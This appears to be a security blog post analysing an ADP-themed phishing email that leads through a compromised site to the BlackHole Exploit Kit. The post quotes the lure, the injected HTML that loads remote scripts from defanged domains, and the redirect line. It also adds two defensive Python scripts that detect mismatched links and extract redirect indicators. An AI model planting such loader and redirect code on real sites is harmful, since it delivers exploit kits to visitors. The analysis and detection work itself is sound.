"ADP Funding Notification – Debit Draft" mail leads to BlackHole Exploit v2.0

Today, one of our visitors informed us about an ADP notification spam mail that is similar to a spam mail intercepted by MX Lab. A few months back, MX Lab intercepted a spam mail that led to BlackHole.
"Your Transaction Report(s) have been uploaded to the web site: https://www.flexdirect.adp.com/client/login.aspx .

Please note that your bank account will be debited within one banking business day for the amount(s) shown on the report(s).

Please do not respond or reply to this automated e-mail. If you have any questions or comments, please Contact your ADP Benefits Specialist.

Thank You, ADP Benefit Services"
The mail displays the original link, but it is actually a hyperlink to a malicious page. This is a small trick by cyber criminals to lure the recipient into believing the e-mail is legitimate.
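One way to catch this trick on the receiving side is to compare the host shown in a link's visible text with the host its href actually points to. The script below is an added example, not code from the original post; the sample message is constructed, and the redirector host "www.redirector.example" stands in for the (redacted) malicious site.

```python
"""Flag HTML e-mail links whose visible text is a URL on one host while the
href points at a different host.  Added example; the sample mail below is
constructed and the attacker host is a placeholder."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# A visible text is treated as a URL only if its host part looks like one.
_HOST_RE = re.compile(r"^[a-z0-9-]+(\.[a-z0-9-]+)+$")


class _LinkCollector(HTMLParser):
    """Collects (href, visible text) pairs for every <a> element."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href", "") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def _host(url):
    """Host of a URL; bare 'www.example.com/path' text is accepted too."""
    if "://" not in url:
        url = "http://" + url
    return (urlparse(url).hostname or "").lower()


def find_mismatched_links(html):
    """Return (visible text, href) for links whose shown host != real host."""
    parser = _LinkCollector()
    parser.feed(html)
    flagged = []
    for href, text in parser.links:
        shown = _host(text)
        if not _HOST_RE.match(shown):
            continue  # visible text is not a URL, nothing to compare
        if shown != _host(href):
            flagged.append((text, href))
    return flagged


# Constructed sample modelled on the ADP lure: the visible text is the real
# ADP login URL, the href is a placeholder for the compromised redirector.
SAMPLE_MAIL = (
    "<p>Your Transaction Report(s) have been uploaded to the web site: "
    '<a href="http://www.redirector.example/gc4pLf0n/index.html">'
    "https://www.flexdirect.adp.com/client/login.aspx</a>.</p>"
    '<p>If you have any questions, <a href="https://www.adp.com/contact">'
    "Contact your ADP Benefits Specialist</a>.</p>"
    '<p>Manage preferences: <a href="https://mail.example.com/prefs">'
    "mail.example.com/prefs</a></p>"
)

if __name__ == "__main__":
    for text, href in find_mismatched_links(SAMPLE_MAIL):
        print(f"MISMATCH: shows {text!r} but goes to {href!r}")
```

Only the ADP-lookalike link is reported; the "Contact" link has non-URL text and the preferences link's text and href agree, so neither is flagged. The same check is easy to wire into a mail gateway or a user-reported-phish triage script.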

If the recipient clicks the link, it leads to "hxxp://www.smilek**.com/gc4pLf0n/index.html". The site is infected and contains the following script:

<html>
<h1>WAIT PLEASE</h1>
 <h3>Loading...</h3>
 <script type="text/javascript" src="hxxp://www.arm**ies.com.ar/QbCwcwN5/js.js"></script>
<script type="text/javascript" src="hxxp://remotepcs**rity.net/0RUuWs5o/js.js"></script>
<script type="text/javascript" src="hxxp://www.ski**ll.net/p10h6Ldg/js.js"></script>
</html>
The above code loads JavaScript from three different domains, but all three domains serve the same script: "document.location='hxxp://209.59.*.*/links/deep_recover-result.php';". It redirects the page to 209.59.**.
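When triaging a captured landing page like this one, the indicators worth pulling out are the external script hosts it loads and the URL each script redirects to. The script below is an added example, not code from the original post; the page and script bodies are constructed stand-ins for the redacted ones (placeholder hosts under .example and the documentation address 203.0.113.10 in place of the real 209.59.*.* IP).

```python
"""Extract external script hosts and document.location redirect targets from
a captured landing page.  Added example; page, script bodies and hosts are
constructed placeholders, not the real (redacted) ones."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse


class _ScriptSrcCollector(HTMLParser):
    """Collects the src attribute of every external <script> tag."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.sources.append(src)


def extract_script_sources(html):
    """Return the src URLs of external script tags, in page order."""
    parser = _ScriptSrcCollector()
    parser.feed(html)
    return parser.sources


# Matches the usual one-line JS redirects: document.location = '...',
# window.location.href = "...", location.replace('...'), location.assign('...').
_REDIRECT_RE = re.compile(
    r"""\blocation(?:\.href)?\s*(?:=|\.(?:replace|assign)\s*\()\s*['"]([^'"]+)['"]"""
)


def find_redirect_targets(js_text):
    """Return every redirect destination found in a script body."""
    return _REDIRECT_RE.findall(js_text)


def analyse_landing_page(html, fetched_scripts):
    """Summarise script hosts and where each script sends the visitor.

    fetched_scripts maps each script src to its body; here the bodies are
    constructed inline, in practice they come from a sandboxed fetch."""
    report = {"script_hosts": [], "redirects": {}}
    for src in extract_script_sources(html):
        report["script_hosts"].append(urlparse(src).hostname)
        for target in find_redirect_targets(fetched_scripts.get(src, "")):
            report["redirects"].setdefault(target, []).append(src)
    return report


# Constructed sample page mirroring the structure of the infected site.
SAMPLE_PAGE = """<html>
<h1>WAIT PLEASE</h1>
 <h3>Loading...</h3>
 <script type="text/javascript" src="hxxp://js-host-a.example/QbCwcwN5/js.js"></script>
<script type="text/javascript" src="hxxp://js-host-b.example/0RUuWs5o/js.js"></script>
<script type="text/javascript" src="hxxp://js-host-c.example/p10h6Ldg/js.js"></script>
</html>"""

# Constructed script bodies: same destination, written three different ways.
TARGET = "hxxp://203.0.113.10/links/deep_recover-result.php"
SAMPLE_SCRIPTS = {
    "hxxp://js-host-a.example/QbCwcwN5/js.js": f"document.location='{TARGET}';",
    "hxxp://js-host-b.example/0RUuWs5o/js.js": f'window.location.href = "{TARGET}";',
    "hxxp://js-host-c.example/p10h6Ldg/js.js": f"var x=1; location.replace('{TARGET}');",
}

if __name__ == "__main__":
    result = analyse_landing_page(SAMPLE_PAGE, SAMPLE_SCRIPTS)
    print("script hosts:", result["script_hosts"])
    for target, sources in result["redirects"].items():
        print(f"redirect to {target} from {len(sources)} script(s)")
```

Three script hosts collapsing onto a single redirect destination is exactly the pattern described above, and the collected hosts plus the destination are the indicators to block and to hunt for in proxy logs.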

After further analysis, I found that the IP hosts the latest version of the BlackHole Exploit Kit (v2.0).

We have to thank our visitor "David Gosche" for reporting this e-mail. If you have also received this kind of spam mail, feel free to report it to us.